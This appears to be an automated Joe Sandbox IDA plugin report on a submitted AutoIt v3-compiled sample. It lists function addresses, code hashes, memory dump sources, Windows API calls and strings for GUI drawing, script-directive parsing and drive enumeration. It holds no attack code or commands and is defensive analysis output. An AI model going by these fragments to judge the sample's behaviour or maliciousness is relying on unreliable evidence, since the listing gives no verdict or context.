Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18aa276161eb3999a4f957b66dfd8cc5ab17b19e633c5ff1735e8ccb839f16a
Instruction ID: c286300d99e2b91445e27a8d3dc9f2c346740fa195f4ecc71a48a56eb8d2d117
Opcode Fuzzy Hash: b18aa276161eb3999a4f957b66dfd8cc5ab17b19e633c5ff1735e8ccb839f16a
Instruction Fuzzy Hash: CD127170A002099BDF04DFA5DA81AEEB7F5FF48304F10852AE406F7291DB3AAD11CB59

Function 0040E3E3 Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64b24a2c553c22aa869de9af687b95242a6e90b579e12135d10eb0df70d050d8
Instruction ID: 8c316f122af884e65fd23efdceb602b2cf0fe7a3b43f3523b9e3e47a843a4e61
Opcode Fuzzy Hash: 64b24a2c553c22aa869de9af687b95242a6e90b579e12135d10eb0df70d050d8
Instruction Fuzzy Hash: F912D170A04205DFDB24DF56C480AAAB7B0FF14304F54C87BD949AB391E339AD96CB99

Function 0040AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: d9789282d456dc797497e94230e5521687c6143ee10994470d5f1e8132ce8b71
Instruction ID: 51b8f2ae0ea6a7a2cdf14863a84620939d9b69a1a68befcef78454a7017468de
Opcode Fuzzy Hash: d9789282d456dc797497e94230e5521687c6143ee10994470d5f1e8132ce8b71
Instruction Fuzzy Hash: 5202D370A00205DBCF04DF65DA81AAEB7B5FF44304F10C07AE80AEB295EB79D955CB99

Function 004202A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 60745259864980ffaeeb8d0df3bf3fea5f6cb1ca8e1c1cebd13c90a26c2c7bac
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 32C1F6323051A30ADF2D8639943447FFAE15A917B171A036FD8B2CB6D2FF28C569D624

Function 004206D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: 44f5d9664e715192188212fdf678a4eee384f5bf2223b1db12e0b08a2e30af3f
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: 67C1E4323052A309DF2D4639943443FBAE15AA27B170A036FD4B3CB6D6FF28C569D624

Function 0041FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 5ea60f499aeb44b68148b7f17fc018670148d17cb1e2a6587ad167bf6fc26cab
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 56C1D23220919309DF2D4639C4304BFBAA15AA17B171A077ED4B3CB6D5FF28C5AAD624

Function 0045A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0045A2FE
DeleteObject.GDI32(00000000), ref: 0045A310
DestroyWindow.USER32 ref: 0045A31E
GetDesktopWindow.USER32 ref: 0045A338
GetWindowRect.USER32(00000000), ref: 0045A33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045A480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0045A490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A4D8
GetClientRect.USER32(00000000,?), ref: 0045A4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0045A51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A55E
GlobalLock.KERNEL32(00000000), ref: 0045A567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A576
GlobalUnlock.KERNEL32(00000000), ref: 0045A57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A586
GlobalFree.KERNEL32(00000000), ref: 0045A591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0048D9BC,00000000), ref: 0045A5B9
GlobalFree.KERNEL32(00000000), ref: 0045A5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0045A5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0045A60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A81D

Strings

DISPLAY, xrefs: 0045A680
AutoIt v3, xrefs: 0045A4D0
static, xrefs: 0045A518, 0045A66F
, xrefs: 0045A7A3

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: c655ef112de186f858fd53f182a34cedddeea54428e8a146943ae00af5ea0fb5
Instruction ID: 53d84e717a84cd646c9bb37dc5a0418975d314d2cf4d1fc3b1c59ead6aebad59
Opcode Fuzzy Hash: c655ef112de186f858fd53f182a34cedddeea54428e8a146943ae00af5ea0fb5
Instruction Fuzzy Hash: 29029C71900108AFDB14DFA5CD88EAE7BB9FF49315F008669F905AB2A2C734DD45CB68

Function 0046D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0046D2DB
GetSysColorBrush.USER32(0000000F), ref: 0046D30C
GetSysColor.USER32(0000000F), ref: 0046D318
SetBkColor.GDI32(?,000000FF), ref: 0046D332
SelectObject.GDI32(?,00000000), ref: 0046D341
InflateRect.USER32(?,000000FF,000000FF), ref: 0046D36C
GetSysColor.USER32(00000010), ref: 0046D374
CreateSolidBrush.GDI32(00000000), ref: 0046D37B
FrameRect.USER32(?,?,00000000), ref: 0046D38A
DeleteObject.GDI32(00000000), ref: 0046D391
InflateRect.USER32(?,000000FE,000000FE), ref: 0046D3DC
FillRect.USER32(?,?,00000000), ref: 0046D40E
GetWindowLongW.USER32(?,000000F0), ref: 0046D439

Part of subcall function 0046D575: GetSysColor.USER32(00000012), ref: 0046D5AE
Part of subcall function 0046D575: SetTextColor.GDI32(?,?), ref: 0046D5B2
Part of subcall function 0046D575: GetSysColorBrush.USER32(0000000F), ref: 0046D5C8
Part of subcall function 0046D575: GetSysColor.USER32(0000000F), ref: 0046D5D3
Part of subcall function 0046D575: GetSysColor.USER32(00000011), ref: 0046D5F0
Part of subcall function 0046D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0046D5FE
Part of subcall function 0046D575: SelectObject.GDI32(?,00000000), ref: 0046D60F
Part of subcall function 0046D575: SetBkColor.GDI32(?,00000000), ref: 0046D618
Part of subcall function 0046D575: SelectObject.GDI32(?,?), ref: 0046D625
Part of subcall function 0046D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0046D644
Part of subcall function 0046D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0046D65B
Part of subcall function 0046D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0046D670
Part of subcall function 0046D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0046D698

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 5c118a33d2c2d460fde787bdf50939b70034371d63d96fdfdebc0911a0607e6a
Instruction ID: fc64aee0f8033bc08b65d9275a05176ebd0246f14ea06a4dbed0e4f224444525
Opcode Fuzzy Hash: 5c118a33d2c2d460fde787bdf50939b70034371d63d96fdfdebc0911a0607e6a
Instruction Fuzzy Hash: 06918C71909301BFCB10AF64DC48E6F7BA9FF89325F100A2EF962961E0D735D9448B5A

Function 0041B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 0041B98B
DeleteObject.GDI32(00000000), ref: 0041B9CD
DeleteObject.GDI32(00000000), ref: 0041B9D8
DestroyCursor.USER32(00000000), ref: 0041B9E3
DestroyWindow.USER32(00000000), ref: 0041B9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 0047D2AA
6F550200.COMCTL32(?,000000FF,?), ref: 0047D2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0047D711

Part of subcall function 0041B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0041B759,?,00000000,?,?,?,?,0041B72B,00000000,?), ref: 0041BA58

SendMessageW.USER32 ref: 0047D758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0047D76F
6F530860.COMCTL32(00000000), ref: 0047D785
6F530860.COMCTL32(00000000), ref: 0047D790

Strings

0, xrefs: 0047D5A5

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: DestroyMessageSendWindow$DeleteF530860Object$CursorF550200InvalidateMoveRect
String ID: 0
API String ID: 2781727448-4108050209
Opcode ID: c742d056502b33e720774442d9f11abb7b45a868f7e6743d571f9bf4dd9cab6d
Instruction ID: 1b00305283755ee8e1f68ab188fd9dc62ffc5e41ef1510419ecd282818b9119d
Opcode Fuzzy Hash: c742d056502b33e720774442d9f11abb7b45a868f7e6743d571f9bf4dd9cab6d
Instruction Fuzzy Hash: C2128D70914201AFDB15CF24C884BEABBF5FF45304F14856EE989DB252C739E882CB99

Function 0044DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0044DBD6
GetDriveTypeW.KERNEL32(?,0049DC54,?,\\.\,0049DC00), ref: 0044DCC3
SetErrorMode.KERNEL32(00000000,0049DC54,?,\\.\,0049DC00), ref: 0044DE29

Strings

Network, xrefs: 0044DD01
FileBackedVirtual, xrefs: 0044DDF5
1394, xrefs: 0044DDA8
Removable, xrefs: 0044DD15
SCSI, xrefs: 0044DD93
SSA, xrefs: 0044DDAF
RAMDisk, xrefs: 0044DCED
SAS, xrefs: 0044DDD2
PhysicalDrive, xrefs: 0044DC67
MMC, xrefs: 0044DDE7
ATAPI, xrefs: 0044DD9A
SATA, xrefs: 0044DDD9
ATA, xrefs: 0044DDA1
Unknown, xrefs: 0044DCE3, 0044DD8C
Fibre, xrefs: 0044DDB6
RAID, xrefs: 0044DDC4
iSCSI, xrefs: 0044DDCB
\\.\, xrefs: 0044DC2B
CDROM, xrefs: 0044DCF7
Virtual, xrefs: 0044DDEE
USB, xrefs: 0044DDBD
SSD, xrefs: 0044DD50
Fixed, xrefs: 0044DD0B

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 211d5a47c5040985159ac9229b6af0c9b2ef00341afde89d37ee035dbdc4283e
Instruction ID: 6daa4424651a3ff9f91f75a13b225e85c42e0a0005a8ee7dfb99819ac34498fa
Opcode Fuzzy Hash: 211d5a47c5040985159ac9229b6af0c9b2ef00341afde89d37ee035dbdc4283e
Instruction Fuzzy Hash: CF51D370E48702EBD604DF12C88196AB7A1FB54706B30492FF443A72D6CA7CE946DB5E

Function 0040CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0040CC68
__wcsnicmp.LIBCMT ref: 0040CC80
__wcsnicmp.LIBCMT ref: 0040CC98
__wcsnicmp.LIBCMT ref: 0040CCB0
__wcsnicmp.LIBCMT ref: 0040CCC8
__wcsnicmp.LIBCMT ref: 0040CCE0
__wcsnicmp.LIBCMT ref: 0040CCF8
__wcsnicmp.LIBCMT ref: 0040CD0C
__wcsnicmp.LIBCMT ref: 0040CD4D
__wcsnicmp.LIBCMT ref: 0040CD61
__wcsnicmp.LIBCMT ref: 0040CD75
__wcsnicmp.LIBCMT ref: 0040CD89

Strings

#pragma compile, xrefs: 0040CC62
#notrayicon, xrefs: 0040CC7A
#include, xrefs: 0040CCDA
#requireadmin, xrefs: 0040CC92
Bad directive syntax error, xrefs: 00472ECB
#include-once, xrefs: 0040CCC2
#cs, xrefs: 0040CD06, 0040CD5B
#ce, xrefs: 0040CD83
#comments-end, xrefs: 0040CD6F
Cannot parse #include, xrefs: 00472FA1
Unterminated group of comments, xrefs: 00472FB4
#OnAutoItStartRegister, xrefs: 0040CCAA
#comments-start, xrefs: 0040CCF2, 0040CD47

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: eb5107a5a4940ecbf9fe01a03824dd2587edc36247d1e4cb65d658f5a9287f53
Instruction ID: 06179b6bf307cae3cf48bf65e9d4e0c3680e96e7f80719158496d28e555dcc9d
Opcode Fuzzy Hash: eb5107a5a4940ecbf9fe01a03824dd2587edc36247d1e4cb65d658f5a9287f53
Instruction Fuzzy Hash: B081F770640215BADB20AB65DDC2FEB3B68AF24344F14413FF909761C6EABC9945C2AD

Function 0046638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0049DC00), ref: 00466449

Strings

SENDCOMMANDID, xrefs: 004667CA
SELECTSTRING, xrefs: 00466626
EDITPASTE, xrefs: 0046675B
FINDSTRING, xrefs: 00466596
ISCHECKED, xrefs: 00466659
UNCHECK, xrefs: 004666A1
SHOWDROPDOWN, xrefs: 00466500
ADDSTRING, xrefs: 00466536
GETCURRENTLINE, xrefs: 00466704
CURRENTTAB, xrefs: 004664DD
GETCURRENTSELECTION, xrefs: 00466603
GETLINE, xrefs: 0046678B
TABLEFT, xrefs: 004664A7
DELSTRING, xrefs: 00466569
CHECK, xrefs: 0046668B
SETCURRENTSELECTION, xrefs: 004665D6
GETSELECTED, xrefs: 004666C1
HIDEDROPDOWN, xrefs: 00466520
GETLINECOUNT, xrefs: 004666E4
GETCURRENTCOL, xrefs: 00466724
ISVISIBLE, xrefs: 00466455
TABRIGHT, xrefs: 004664BD
ISENABLED, xrefs: 0046648C

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 91848f4db4a6ba0e11d3663a0ff195f9e0f227ac7515a5377fbcd9b420cc48dd
Instruction ID: bf06782b9b2ecba1bbd79463fd2e0cebf5d6bb80645d400e677d0eaac971ff05
Opcode Fuzzy Hash: 91848f4db4a6ba0e11d3663a0ff195f9e0f227ac7515a5377fbcd9b420cc48dd
Instruction Fuzzy Hash: DDC144342042469BCA04EF12C551AAE7795AF94348F05486FF88557393EB3CED4ACB9F

Function 0046D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0046D5AE
SetTextColor.GDI32(?,?), ref: 0046D5B2
GetSysColorBrush.USER32(0000000F), ref: 0046D5C8
GetSysColor.USER32(0000000F), ref: 0046D5D3
CreateSolidBrush.GDI32(?), ref: 0046D5D8
GetSysColor.USER32(00000011), ref: 0046D5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0046D5FE
SelectObject.GDI32(?,00000000), ref: 0046D60F
SetBkColor.GDI32(?,00000000), ref: 0046D618
SelectObject.GDI32(?,?), ref: 0046D625
InflateRect.USER32(?,000000FF,000000FF), ref: 0046D644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0046D65B
GetWindowLongW.USER32(00000000,000000F0), ref: 0046D670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0046D698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0046D6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 0046D6DD
DrawFocusRect.USER32(?,?), ref: 0046D6E8
GetSysColor.USER32(00000011), ref: 0046D6F6
SetTextColor.GDI32(?,00000000), ref: 0046D6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0046D712
SelectObject.GDI32(?,0046D2A5), ref: 0046D729
DeleteObject.GDI32(?), ref: 0046D734
SelectObject.GDI32(?,?), ref: 0046D73A
DeleteObject.GDI32(?), ref: 0046D73F
SetTextColor.GDI32(?,?), ref: 0046D745
SetBkColor.GDI32(?,?), ref: 0046D74F

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 2039d84bbd0d8d6a908357fb291e8e5a3798165faa8669297357dc3c436a1c46
Instruction ID: 2e03f9327eeab2d40ca4f816ed687680e735fa5ad21fcb0366a83fd56a694508
Opcode Fuzzy Hash: 2039d84bbd0d8d6a908357fb291e8e5a3798165faa8669297357dc3c436a1c46
Instruction Fuzzy Hash: C8512A71D01218BFDF10AFA8DC48EAE7BB9EF08324F10452AF915AB2E1D7759A409F54

Function 0046B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0046B7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0046B7C1
CharNextW.USER32(0000014E), ref: 0046B7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0046B831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0046B847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0046B858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0046B875
SetWindowTextW.USER32(?,0000014E), ref: 0046B8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0046B8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 0046B90E
_memset.LIBCMT ref: 0046B933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0046B97C
_memset.LIBCMT ref: 0046B9DB
SendMessageW.USER32 ref: 0046BA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 0046BA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 0046BB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 0046BB2C
GetMenuItemInfoW.USER32(?), ref: 0046BB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046BBA3
DrawMenuBar.USER32(?), ref: 0046BBB2
SetWindowTextW.USER32(?,0000014E), ref: 0046BBDA

Strings

0, xrefs: 0046BB4F

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
